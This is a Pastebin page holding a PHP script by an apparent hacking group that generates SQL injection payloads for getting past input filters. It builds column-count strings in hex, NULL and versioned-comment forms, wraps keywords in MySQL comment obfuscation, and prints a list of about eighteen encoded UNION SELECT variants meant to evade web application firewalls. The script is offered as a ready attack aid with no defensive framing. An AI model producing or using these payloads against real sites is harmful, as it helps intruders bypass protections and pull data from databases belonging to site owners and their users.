API tools faq
paste
Advertisement
Iq_Team

Bypass Orders SQL injection

Iq_Team
Apr 23rd, 2014
112
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.21 KB | None | 0 0
raw download clone embed print report
  1. <form method='POST'> <center>
  2. <title>Bypass Orders SQL injection</title>
  3. <h3>Bypass Orders SQL injection</h3>
  4.  <pre>bypass numbers</pre>
  5. <select name='Numper'>
  6. <option value='bypass 1'>hex</option>
  7. <option value='bypass 2'>()</option>
  8. <option value='bypass 3'>hexx</option>
  9. <option value='bypass 4'>null</option>
  10. <option value='bypass 5'>%2</option>
  11. <option value='bypass 6'>/*!*/</option>
  12. <option value='bypass 7'>unhex</option>
  13. <option value='bypass 8'>%0A</option>
  14. </select>
  15. <input type='text' rows="11" cols="100" name='ips' />
  16. <input type='submit' name='start' value='Go' />
  17. <pre>
  18. <?php
  19. // Aithor : Hack 109
  20. // IQ-Team
  21. //open sourse
  22. @set_time_limit(0);
  23. @error_reporting(0);
  24.  
  25.      if($_POST['start'])
  26.      {
  27.     $Numper = $_POST['Numper'];
  28. $i = trim($_POST["ips"]);
  29. for($ips=1;$ips<=$i;$ips++) {
  30.  
  31.  
  32.     switch ($Numper)
  33.     {
  34.  
  35.         case 'bypass 1':
  36.  
  37.       echo ("0x".bin2hex('kw'.$x).',');
  38.             break;
  39.  
  40.         case 'bypass 2':
  41.            echo ("(".$ips.")".',');
  42.             break;
  43.  
  44.         case 'bypass 3':
  45.          echo ("0x".bin2hex('!~kw'.':'.$ips).bin2hex($ips.'~!').",");
  46.             break;
  47.         case 'bypass 4':
  48.          
  49. for($NULL=NULL;$ips<=$i;$ips++) :
  50.  
  51.                 echo 'NULL'.",";
  52.             endfor;
  53.              break;
  54.         case 'bypass 5':
  55.         for($c='%2C';$ips<$i;$ips++) :
  56.         $zx = ($ips-'%2C');
  57.         echo  $ips."%2C".$zx;
  58.       endfor;
  59.                 break;
  60.  
  61.         case 'bypass 6':
  62.        echo "/*!".$ips."*/".",";
  63.         break;
  64.         case 'bypass 7':
  65.         echo "unhex(hex(".$ips."))".",";
  66.         break;
  67.         case 'bypass 8':
  68.  
  69.       for($xa='+%0A';$ips<=$i;$ips++) :
  70.         $xaa .= $xa.',';
  71.                  endfor;
  72.        echo $xaa;
  73.    
  74.             break;
  75.           }
  76.  
  77.            
  78.       }
  79. }
  80.        echo "<hr />";
  81.  
  82. echo "<form method='POST'><center>
  83. <pre>Just one word</pre>
  84. <select name='filter'>
  85. <option >Filter</option>
  86. <option >Filter2</option>
  87. <input type='text' name='un'  />
  88. <input type='submit' name='ok' value='Go' />
  89. </select>
  90. </form></center>";
  91.                 if($_POST['ok']) {
  92.                     $un = trim($_POST['un']);
  93.                         $filter = $_POST['filter'];
  94.  
  95.                 switch($filter) {
  96.  
  97.                   case 'Filter';
  98.  
  99.                 $cap = "/**//*!".strtoupper($un)."*//**/";
  100.                    
  101.                     $ux = str_replace( $un, $cap, $un);                      
  102.                             echo $ux;
  103.  
  104.                       break;
  105.                       case 'Filter2';
  106.  
  107.                         $cap1 = "/**//*!12345".strtoupper($un)."*//**/";
  108.                         $ux1 = str_replace( $un, $cap1, $un);                      
  109.                             echo $ux1;
  110.                             break;
  111.                  }
  112.            }
  113. echo "<hr />";
  114.  
  115. echo "<form method='POST'><center>
  116. <pre>Input Numbers > Show Output = Union+Select+N</pre>
  117. <input type='text' name='vn'  />
  118. <input type='submit' name='yes' value='Go' />
  119. </form></center>";
  120.  
  121. if($_POST['yes']) :
  122. $i = trim($_POST["vn"]);
  123.  
  124.   for($pp=1; $pp<=$i; $pp++) :
  125.   $x .= $pp.",";
  126.  endfor;
  127. $a = array("/*!UNION*/ /*!%0ASELECT*/", "/*!%0AUNION*/ /*!%0ASELECT*/",  "/**//*!12345UNION SELECT*//**/",  "/**//**//*!12345UNiON*//**//**//*!12345ALL*//**//**//*!12345SELECT*//**//**/",  "/**//**//*!50000%55NION*//**//**//*!50000%53ELECT*//**//**/",  "/**//*!12345UNION SELECT*//**/", "+union+distinct+select+",  "+union+distinctROW+select+",  "%20/*!12345UNION*/%20/*!12345SELECT*/%20%201",  "/*_*/%2f%2a%2120000union%2a%2f/*,*/%2f%2a%2120000SelEct%2a%2f/*,*/",  "null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/",  "/**/un/**/ion+se/**/lect/**/", "/*,*/uni%0bon+se%0blect/*,*/",  "/*_*//*!20000%0D%0Aunion*/+/*!20000%0D%0ASelEct*//*_*/",  "/**//**//*!12345%55nIoN*//**//**//*!12345%53ElEcT*//**//**/",  "/*!12345%0AUNION*/ /*!12345%0ASELECT*/", "/*!12345UNION*/  /*!12345SELECT*/", "/*!%0AUNION*/ /*!%0ASELECT*/");
  128. foreach($a as $ari) :
  129.   echo $ari.$x."<hr>";
  130. endforeach;
  131. endif;
  132.  
  133.  
  134. ?>
  135. <h3>Greats To ALL Members In<a href="http://www.iq-team.org/"  tabindex="1">  IQ-Team </h3></a>
  136. <center> Coded by : Hack 109 </center>
  137. <center>&copy; IQ-Team</center>
  138. </pre>
  139. </body>
  140. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!